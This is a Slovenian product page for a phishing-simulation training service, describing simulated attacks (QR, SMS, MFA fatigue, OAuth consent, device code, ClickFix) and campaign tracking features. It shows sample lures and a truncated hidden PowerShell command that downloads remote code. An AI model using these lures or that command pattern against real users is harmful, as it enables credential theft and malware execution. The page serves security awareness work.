Vrste napadov in funkcije

En sistem kampanj.
Osem načinov napada.

Phishing že dolgo ni le lažni prijavni obrazec. Phishtime simulira tehnike, ki jih napadalci res uporabljajo, in vsako meri posebej. Če je nekdo potrdil poziv za prijavo, je to druga napaka, kot če je vpisal geslo, in zahteva drugačen odziv.

Sledena povezava

E-pošta s sledenim gumbom. Klik se zabeleži, prejemnik pa pride na prijavno stran kampanje: na realističen zaslon za prijavo, poziv MFA ali okno za soglasje, odvisno od tega, kaj kampanja preverja.

Meri: dostavo, odprtje, klik in oddajo. Ponovljeni dogodki v 60 sekundah se štejejo enkrat, zato samodejno nalaganje v poštnih odjemalcih ne napihne številk.

QR koda (quishing)

Ista kampanja, le da je v sporočilu QR koda. Zaposleni jo skenira z zasebnim telefonom, ki ga ne nadzirajo ne vaš MDM ne proxy ne zaščita na končnih točkah. Prav zato jo napadalci tako radi uporabljajo.

Meri: skeniranje kot klik, zato se izpostavljenost quishingu pokaže v istem lijaku kot vsi drugi dogodki.

Zapadli_racun_Q3.docx184 KB · finance-shared@

Sledena priponka

Phishtime datoteko HTML, TXT, DOCX ali XLSX ustvari sam in jo priloži sporočilu kampanje. Izberete, ali datoteka ob odprtju to takoj sporoči ali pa vsebuje sledeno povezavo.

Meri: kdo odpira priponke zunanjih pošiljateljev in, ločeno od tega, kdo se nato tudi odzove na njihovo vsebino.

Vašega paketa ni bilo mogoče dostaviti. Izberite nov termin: post-track.example/r/8k2 Danes 14:02
Sporočila

SMS in Viber

Kratko sporočilo s sledeno povezavo, poslano z vašega registriranega pošiljatelja. Smishing pride na napravo, ki je ne varuje nobena od vaših zaščit e-pošte, rezultati pa se prikažejo v istem pregledu kot pri e-poštni kampanji.

Pogoji: potrjena telefonska številka in lasten račun pri ponudniku sporočil. Vsebino sporočil pred pošiljanjem samodejno pregledamo.

Prijavne strani: štiri različne napake

Obrazec za geslo pokaže, kdo vpisuje gesla. O tem, kdo ob sedmih zjutraj potrdi poziv za prijavo, pa ne pove ničesar.

Zajem prijavnih podatkov

Realistična prijavna stran. Ko uporabnik obrazec odda, se to zabeleži, vpisane vrednosti pa se zavržejo, še preden bi se shranile. Ohrani se le ime polja: veste, kaj je stran zahtevala, nikoli pa, kaj je kdo vpisal.

Odobrite prijavo?
Ljubljana, SI · nova naprava
Zavrni Odobri

Potrditev prijave MFA

Poziv »Ali odobrite to prijavo?« z gumboma Odobri in Zavrni. Odgovora se beležita ločeno, zato izpostavljenost utrujanju MFA ni več le skrb, temveč številka, ki jo lahko spremljate skozi čas.

Expense Sync želi dostop
Branje vaše pošte Branje vaših stikov
Prekliči Dovoli

Soglasje za aplikacijo OAuth

Posnetek zaslona, na katerem aplikacija tretje osebe zahteva dostop. Pri tem napadu napadalec dobi žeton, ne da bi kdo vpisal geslo, zato zamenjava gesel ne pomaga. Prav zato je vreden usposabljanja.

Za nadaljevanje vpišite kodo
WXTQ-4821
↳ microsoft.com/devicelogin

Koda naprave

Vaba posnema obvestilo o deljenem dokumentu, na primer »Finance je z vami delil datoteko«, vendar ne vodi do dokumenta, temveč do realističnega vnosa kode naprave in prijave. Več skupin pravih napadalcev to tehniko trenutno uporablja najraje, programi ozaveščanja pa je skoraj ne pokrivajo.

Win + R → Zaženi
powershell -w hidden -c "iwr hxxp://…

ClickFix - lažni CAPTCHA

»Potrdite, da ste človek: zaženite ta ukaz.« Stran prepozna napravo in prikaže ustrezna navodila: Win+R v sistemu Windows, Terminal prek Spotlighta na Macu ali bližnjico za terminal v Linuxu. Phishtime zabeleži signal, ki bi ga sprožila prava škodljiva koda. Tako natančno izveste, kdo bi jo zagnal, ne da bi se karkoli zares izvedlo.

Sistem kampanj

Vse okoli vabe

Priprava vsebine

✓Več kot 30 pripravljenih predlog z ujemajočimi se prijavnimi stranmi, ki jih vzdržujemo mi
✓Vsako lahko skopirate v svoj delovni prostor in poljubno uredite
✓Vizualni urejevalnik s sprotnim predogledom ali neposredno urejanje HTML
✓Spremenljivke za prilagajanje: ime, priimek, e-naslov, ID zaposlenega
✓Večjezična vsebina: ena predloga, besedilo za vsak jezik

Ciljanje in pošiljanje

✓Pošljite izbranim skupinam ali vsem; prejemniki se določijo ob zagonu, glede na trenutni seznam zaposlenih
✓Pošiljanje takoj, postopoma v izbranih presledkih ali razporejeno v časovnem oknu
✓Zagon, načrtovan za poljuben datum in uro
✓Naša upravljana pošta ali vaš strežnik SMTP z lastnim podpisom DKIM
✓Testno pošiljanje končnega sporočila sebi, preden ga vidi kdorkoli drug

Sledenje

✓Odprtja, kliki, oddaje, potrditve, soglasja, signali in prijave
✓Vsak prejemnik ima svoj naključni žeton, v povezavah ni oznak, ki bi jih bilo mogoče uganiti
✓Stanje odziva se lahko le stopnjuje, zato osvežitev strani ne more spremeniti zgodovine
✓Obiski varnostnih skenerjev so izločeni iz rezultatov zaposlenih
✓Ko vpišete IP-naslove pisarne, VPN ali podatkovnega centra, se vsak dogodek označi kot notranji ali zunanji. Tako vidite, kdo je kliknil v pisarni in kdo z zasebne naprave zunaj omrežja
✓Lijak v realnem času, časovnica po minutah in zaporedje dogodkov za vsako osebo

Usposabljanje takoj po kliku

✓Stran za ozaveščanje se prikaže takoj po napaki in našteje znake, ki bi jih lahko opazili
✓Dodatno sporočilo po e-pošti z enako vsebino
✓V jeziku, ki ste ga določili posameznemu zaposlenemu
✓Vaš logotip, ime in naslov za podporo na vseh straneh usposabljanja

Zaposleni

✓Uvoz iz datoteke CSV ali sinhronizacija imenika Entra ID za izbrane skupine
✓Skupine po oddelkih, lokacijah ali stopnji tveganja, kakor želite razvrstiti rezultate
✓Točke in nagrade: odbitek, ko nekdo naseda, in priznanje, ko se napadu upre
✓Portal za zaposlene z osebno zgodovino in uvrstitvijo
✓Lestvica s polnimi imeni, samo začetnicami ali izklopljena

Poročila in dokazila

✓Delež zaposlenih, dovzetnih za phishing (PPP), tudi brez tistih, ki so napad prijavili
✓Delež prijav napada, delež ponavljajočih se klikov, čas do klika in čas do prijave
✓Izvoz CSV, poročilo PDF za vsako kampanjo in obdobna poročila za več kampanj po oddelkih
✓Revizijski dnevnik, ki ga ni mogoče spreminjati, z izvozom CSV in API za SIEM
✓Zajem iz nabiralnika SOC: prijave z gumbom »Prijavi phishing« v Outlooku se samodejno zajamejo in povežejo s kampanjo

Preizkusite v svojem okolju

Registrirajte se brezplačno, potrdite svojo domeno, dodajte nekaj testnih naslovov in enega od teh napadov izvedite zares. Brez kartice in brez prodajnih klicev.

Kaj vključuje brezplačni paket →